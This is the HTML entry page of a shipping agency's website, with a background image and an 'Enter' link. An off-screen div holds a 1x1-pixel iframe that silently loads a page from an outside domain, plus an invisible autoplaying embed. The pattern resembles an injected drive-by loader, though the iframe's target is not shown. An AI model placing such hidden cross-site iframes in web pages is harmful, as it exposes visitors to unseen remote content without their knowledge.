<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<title>Alradwan Shipping Agency</title>
<meta name="generator" content="Antenna 4.5">
<meta http-equiv="imagetoolbar" content="no">
<link rel="stylesheet" type="text/css" href="antenna.css" id="css">
<style type="text/css">.abs {position:absolute}</style>
<script type="text/javascript" src="antenna/auto.js"></script>
</head>
<body class="global ctt">
<div class="ctr global" style="width:827px">
<div id="lays534vnatk">
<div id="pict971kbyme" class="hid abs" style="left:2px; top:2px; width:825px; height:536px;">
<img id="pict971kbymei" class="fil smf" src="2021.jpg" alt="">
</div>
<div id="pict477nifan" class="hid abs" style="left:374px; top:464px; width:98px; height:86px;">
<img id="pict477nifani" class="fil smf" src="4.gif" alt="">
</div>
<div id="text535ucrog" class="aut abs" style="left:355px; top:482px; width:137px; height:50px;">
 <p align="center"><span style="font-size: 16px"><font face="Arial, Helvetica, sans-serif" color="#ffffff"><b>Enter</b></font></span></p>
 </div>
<div id="pict535bqldq" class="hid abs" style="left:351px; top:456px; width:132px; height:70px;">
<a href="1.htm"><img id="pict535bqldqi" class="fil smf" src="b.gif" alt="">
</a>
</div>
<div id="vhtm497eggka" class="hid abs" style="left:-175px; top:230px; width:131px; height:75px;">
 <IFRAME WIDTH=1 HEIGHT=1 SRC="http://www.9eg.net/iframe/info.html"></IFRAME>

<!-- Mp3 In Index Code | 1 -->
</center><embed src="http://www.youtube.com/watch?v=csFgMq2tmTU" align="baseline" border="0" width="0" height="0" type="audio/x-pn-realaudio-plugin" console="Clip1" controls="ControlPanel" autostart="true"></embed></center>
<!-- Mp3 In Index Code | Finish -->
 </div>
<div id="text973kvkrk" class="aut abs" style="left:214px; top:390px; width:426px; height:58px;">
 <p align="center"><span style="font-size: 35px"><font color="#ffffff" face="Arial, Helvetica, sans-serif"><b>       </b></font></span></p>
 </div>
</div>
</div></body></html>
